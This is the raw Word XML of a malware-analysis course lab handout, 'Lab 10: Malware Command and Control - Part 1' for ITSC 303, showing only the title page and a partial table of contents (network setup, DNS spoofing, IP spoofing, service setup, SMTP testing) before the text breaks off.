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7688" w14:textId="77777777" w:rsidR="00C04854" w:rsidRDefault="00C04854" w:rsidP="007F2B57"/>
    <w:p w14:paraId="272F8A3D" w14:textId="77777777" w:rsidR="00C01287" w:rsidRPr="00644444" w:rsidRDefault="004540D0" w:rsidP="007F2B57">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-CA"/>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6A7895DA" w:rsidR="005A25B4" w:rsidRPr="001547CE" w:rsidRDefault="00F62EC0" w:rsidP="007F2B57">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-CA"/>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2866EF47" w14:textId="0B94EDA9" w:rsidR="002E6E3D" w:rsidRPr="00090ACB" w:rsidRDefault="002E6E3D"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767D7429" w14:textId="54CD49E9" w:rsidR="002E6E3D" w:rsidRPr="00A45EC3" w:rsidRDefault="002E6E3D" w:rsidP="007E5769">
                                <w:pPr>
                                  <w:pStyle w:val="TitlePageCourseName"/>
                                  <w:rPr>
                                    <w:rFonts w:ascii="Titillium Bd" w:hAnsi="Titillium Bd"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r>
                                  <w:rPr>
                                    <w:rFonts w:ascii="Titillium Bd" w:hAnsi="Titillium Bd"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve">Lab 10: </w:t>
                                </w:r>
                                <w:r w:rsidRPr="0072059B">
                                  <w:rPr>
                                    <w:rFonts w:ascii="Titillium Bd" w:hAnsi="Titillium Bd"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve">Malware Command and Control </w:t>
                                </w:r>
                                <w:r w:rsidR="00D43C78">
                                  <w:rPr>
                                    <w:rFonts w:ascii="Titillium Bd" w:hAnsi="Titillium Bd"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve">- </w:t>
                                </w:r>
                                <w:r w:rsidRPr="0072059B">
                                  <w:rPr>
                                    <w:rFonts w:ascii="Titillium Bd" w:hAnsi="Titillium Bd"/>
                                  </w:rPr>
                                  <w:t>Part 1</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0394799F" w14:textId="46DF0243" w:rsidR="002E6E3D" w:rsidRPr="00A45EC3" w:rsidRDefault="002E6E3D" w:rsidP="007E5769">
                                <w:pPr>
                                  <w:pStyle w:val="TitlePageModuleTitle"/>
                                  <w:rPr>
                                    <w:rFonts w:ascii="Titillium Bd" w:hAnsi="Titillium Bd"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r>
                                  <w:rPr>
                                    <w:rFonts w:ascii="Titillium Bd" w:hAnsi="Titillium Bd"/>
                                  </w:rPr>
                                  <w:t>ITSC 303: Malware Analysis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950A1D" w14:textId="3D2A3FCE" w:rsidR="002E6E3D" w:rsidRPr="008B6EED" w:rsidRDefault="002E6E3D"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2866EF47" w14:textId="0B94EDA9" w:rsidR="002E6E3D" w:rsidRPr="00090ACB" w:rsidRDefault="002E6E3D" w:rsidP="007F2B57"/>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767D7429" w14:textId="54CD49E9" w:rsidR="002E6E3D" w:rsidRPr="00A45EC3" w:rsidRDefault="002E6E3D" w:rsidP="007E5769">
                          <w:pPr>
                            <w:pStyle w:val="TitlePageCourseName"/>
                            <w:rPr>
                              <w:rFonts w:ascii="Titillium Bd" w:hAnsi="Titillium Bd"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Titillium Bd" w:hAnsi="Titillium Bd"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Lab 10: </w:t>
                          </w:r>
                          <w:r w:rsidRPr="0072059B">
                            <w:rPr>
                              <w:rFonts w:ascii="Titillium Bd" w:hAnsi="Titillium Bd"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Malware Command and Control </w:t>
                          </w:r>
                          <w:r w:rsidR="00D43C78">
                            <w:rPr>
                              <w:rFonts w:ascii="Titillium Bd" w:hAnsi="Titillium Bd"/>
                            </w:rPr>
                            <w:t xml:space="preserve">- </w:t>
                          </w:r>
                          <w:r w:rsidRPr="0072059B">
                            <w:rPr>
                              <w:rFonts w:ascii="Titillium Bd" w:hAnsi="Titillium Bd"/>
                            </w:rPr>
                            <w:t>Part 1</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0394799F" w14:textId="46DF0243" w:rsidR="002E6E3D" w:rsidRPr="00A45EC3" w:rsidRDefault="002E6E3D" w:rsidP="007E5769">
                          <w:pPr>
                            <w:pStyle w:val="TitlePageModuleTitle"/>
                            <w:rPr>
                              <w:rFonts w:ascii="Titillium Bd" w:hAnsi="Titillium Bd"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Titillium Bd" w:hAnsi="Titillium Bd"/>
                            </w:rPr>
                            <w:t>ITSC 303: Malware Analysis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16950A1D" w14:textId="3D2A3FCE" w:rsidR="002E6E3D" w:rsidRPr="008B6EED" w:rsidRDefault="002E6E3D" w:rsidP="007F2B57"/>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="005A25B4">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41562014" w14:textId="77777777" w:rsidR="00C01287" w:rsidRDefault="00C01287" w:rsidP="007F2B57"/>
    <w:p w14:paraId="2019695F" w14:textId="77777777" w:rsidR="00C10B87" w:rsidRPr="001547CE" w:rsidRDefault="00C10B87" w:rsidP="007F2B57"/>
    <w:p w14:paraId="09EC2DA4" w14:textId="77777777" w:rsidR="00C01287" w:rsidRPr="001547CE" w:rsidRDefault="00C01287" w:rsidP="007F2B57"/>
    <w:p w14:paraId="449FB509" w14:textId="2535E64E" w:rsidR="009F6C19" w:rsidRDefault="009F6C19" w:rsidP="007F2B57"/>
    <w:p w14:paraId="0A409048" w14:textId="77777777" w:rsidR="009F6C19" w:rsidRPr="009F6C19" w:rsidRDefault="009F6C19" w:rsidP="009F6C19"/>
    <w:p w14:paraId="14316910" w14:textId="77777777" w:rsidR="009F6C19" w:rsidRPr="009F6C19" w:rsidRDefault="009F6C19" w:rsidP="009F6C19"/>
    <w:p w14:paraId="5CB3CADC" w14:textId="77777777" w:rsidR="009F6C19" w:rsidRPr="009F6C19" w:rsidRDefault="009F6C19" w:rsidP="009F6C19"/>
    <w:p w14:paraId="0514BB03" w14:textId="77777777" w:rsidR="009F6C19" w:rsidRPr="009F6C19" w:rsidRDefault="009F6C19" w:rsidP="009F6C19"/>
    <w:p w14:paraId="349819B1" w14:textId="77777777" w:rsidR="009F6C19" w:rsidRPr="009F6C19" w:rsidRDefault="009F6C19" w:rsidP="009F6C19"/>
    <w:p w14:paraId="1FD107D8" w14:textId="4A1E681A" w:rsidR="009F6C19" w:rsidRDefault="009F6C19" w:rsidP="009F6C19"/>
    <w:p w14:paraId="13172206" w14:textId="77777777" w:rsidR="009F6C19" w:rsidRPr="009F6C19" w:rsidRDefault="009F6C19" w:rsidP="009F6C19"/>
    <w:p w14:paraId="0B8C8E42" w14:textId="79810AE1" w:rsidR="009F6C19" w:rsidRDefault="009F6C19" w:rsidP="00900BDB"/>
    <w:p w14:paraId="668B5D9C" w14:textId="0B931DE4" w:rsidR="009F6C19" w:rsidRDefault="009F6C19" w:rsidP="009F6C19"/>
    <w:p w14:paraId="25EE5CBE" w14:textId="77777777" w:rsidR="00C01287" w:rsidRPr="009F6C19" w:rsidRDefault="00C01287" w:rsidP="009F6C19">
      <w:pPr>
        <w:sectPr w:rsidR="00C01287"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7C021" w:rsidR="008C2E88" w:rsidRPr="007E5769" w:rsidRDefault="008C2E88" w:rsidP="00566DA9">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:spacing w:before="0"/>
          </w:pPr>
          <w:r w:rsidRPr="007E5769">
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7D51CEDE" w14:textId="77777777" w:rsidR="00DB37E7" w:rsidRDefault="00F62EC0">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="22"/>
              <w:lang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24514467" w:history="1">
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Lab Outcomes</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc24514467 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="467A262A" w14:textId="77777777" w:rsidR="00DB37E7" w:rsidRDefault="002922E3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc24514468" w:history="1">
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Background Reading</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc24514468 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5716FB7D" w14:textId="77777777" w:rsidR="00DB37E7" w:rsidRDefault="002922E3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc24514469" w:history="1">
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc24514469 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27BAC945" w14:textId="77777777" w:rsidR="00DB37E7" w:rsidRDefault="002922E3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc24514470" w:history="1">
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>1.0</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:bCs w:val="0"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-CA"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Network Setup</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc24514470 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43C83442" w14:textId="77777777" w:rsidR="00DB37E7" w:rsidRDefault="002922E3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc24514471" w:history="1">
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-CA"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Windows Analysis Machine Network Setup</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc24514471 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="728999CC" w14:textId="77777777" w:rsidR="00DB37E7" w:rsidRDefault="002922E3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc24514472" w:history="1">
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-CA"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DNS Spoofing Setup</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc24514472 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23DE0E70" w14:textId="77777777" w:rsidR="00DB37E7" w:rsidRDefault="002922E3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc24514473" w:history="1">
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-CA"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IP Address Spoofing</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc24514473 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18DCA4C0" w14:textId="77777777" w:rsidR="00DB37E7" w:rsidRDefault="002922E3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc24514474" w:history="1">
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>2.0</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:bCs w:val="0"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-CA"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Service Setup</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc24514474 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63A906DB" w14:textId="77777777" w:rsidR="00DB37E7" w:rsidRDefault="002922E3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc24514475" w:history="1">
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>3.0</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:bCs w:val="0"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-CA"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>SMTP Testing</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc24514475 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6678E6BC" w14:textId="77777777" w:rsidR="00DB37E7" w:rsidRDefault="002922E3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc24514476" w:history="1">
            <w:r w:rsidR="00DB37E7" w:rsidRPr="00884D46">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4.0</w:t>
            </w:r>
            <w:r w:rsidR="00DB37E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:bCs w:val="0"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-CA"/>
              </w:rPr>
              <w:tab/>
            </w:r>
